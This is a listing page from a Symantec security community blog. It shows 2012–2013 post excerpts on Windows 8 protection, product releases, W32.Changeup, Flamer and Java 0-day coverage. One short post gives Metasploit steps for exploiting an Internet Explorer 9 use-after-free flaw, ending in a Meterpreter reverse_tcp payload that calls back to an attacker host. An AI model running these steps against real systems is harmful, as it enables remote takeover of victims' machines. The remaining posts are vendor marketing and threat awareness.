Video Screencast Help

Security Community Blog

Showing posts tagged with Symantec Protection Suites (SPS)
Showing posts in English
piero_depaoli | 08 Jan 2013 | 0 comments

Microsoft gets it. Today, it makes no sense to release an operating system, especially a game-changer like Windows 8, without some form of basic antivirus protection. That’s why Windows 8 comes preloaded with a default form of protection, Windows Defender, that automatically kicks in when the system does not boot up with installed third-party protection.

 

If you get Defender for free with Windows 8, is there any point to getting any further protection? Yes -- at least 83 to begin with…

 

The numbers tell a compelling performance story

In side-by-side tests conducted by PassMark, an independent laboratory, Windows 8 with Symantec Endpoint Protection 12 consistently outperformed Windows 8 without it (with Defender as its default). Consider the highlights:

 

  • 83% faster scanning: End users spend more time working, less time managing interruptions.
...
pauldchavez | 03 Dec 2012 | 0 comments

Symantec would like to announce the general availability of Symantec Mail Security for Microsoft Exchange v7.0 (SMSMSE 7.0). Microsoft Exchange continues to be the leading application used for business communication across email and organizations must protect this environment from email-born threats and the loss of sensitive data. Symantec Mail Security for Microsoft Exchange v7.0 fully supports the latest Microsoft Exchange versions to maximize protection.

Summary of New Features:

• Support for Microsoft Exchange 2013 and Microsoft®Hosted Exchange environments

• Out-of-the-box content filtering templates for protection against data loss

• Improved anti-malware and anti-spam effectiveness through advanced heuristics

• Improved manageability with full message quarantine

• Up to 30 percent performance improvement for mailbox scanning

• Microsoft® Systems Center Operation Manager 2007 R2 support for...

Brandon Noble | 30 Nov 2012 | 15 comments

I. BACKGROUND:
In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hackitivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increased in web based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

 

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

 

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.
 

File-Based Protection (Traditional Antivirus)more info

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to...
BJT | 04 Jun 2012 | 0 comments

At this time, Flamer seems to have targeted only a few hundred organizations and individuals located in a small segment of the globe. But make no mistake; Flamer is important worldwide.  The complexity of the code within Flamer is on par with that seen in Stuxnet; arguably the most complex piece of malware Symantec has analyzed to date.  However the mission of Flamer is much different from that of Stuxnet, which was designed to deliver a payload that disrupted the systems it was targeted toward.  Symantec and others’ research indicates that Flamer, as of this moment; is purely focused on capture and exfiltration of sensitive information.
   
The good news for our public sector customers is that Symantec has protections in place to detect this threat (W32.Flamer). Specifically, we have:

  • AntiVirus, AntiSpyware, IPS component, Symantec Insight, and Heuristics detection and conviction measures in Symantec Protection Suite...